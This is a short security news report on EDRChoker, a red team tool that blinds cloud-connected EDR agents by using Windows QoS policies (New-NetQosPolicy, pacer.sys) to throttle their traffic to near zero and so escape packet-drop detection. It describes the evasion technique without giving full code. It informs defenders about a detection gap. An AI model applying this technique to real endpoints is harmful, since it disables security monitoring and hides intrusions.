A red team tool named EDRChoker has been released, targeting cloud connected Endpoint Detection and Response agents through a novel network throttling technique. Instead of terminating processes or injecting code, EDRChoker uses Windows’ native Policy Based Quality of Service engine to restrict bandwidth for EDR processes to near zero. This effectively severs the communication link between the endpoint agent and its cloud management server, preventing the agent from sending telemetry, receiving policy updates, or executing remote commands.
Technique and Bypass
EDRChoker leverages the Windows New Net QosPolicy PowerShell command to apply throttle rates as low as 8 bits per second on specific EDR process executables. At this extreme limit, even a standard TLS handshake fails because the required data exchange cannot complete within the typical timeout window. The tool’s key innovation is its use of the pacer.sys driver, which operates as an NDIS Lightweight Filter Driver above the physical network interface card, positioned beneath the Windows Filtering Platform in the network stack. This stack position allows EDRChoker to evade detection rules that monitor for packet blocking events generated by higher level filter platforms.
Impact and Scope
Traditional methods for disrupting EDR communications, such as Windows Defender Firewall rules or Windows Filtering Platform API calls, produce packet drop events that security platforms like Elastic Defend can detect. EDRChoker avoids these detectable events, instead producing connection dropped errors that closely resemble ordinary network timeouts. By exploiting an architectural dependency of cloud connected EDR systems requiring persistent low latency connections, the tool presents a stealthier option for red teams testing defense evasion capabilities. It highlights a potential blind spot in current EDR detection mechanisms that focus on process termination or firewall rule modifications.
Source: Cyber Security News
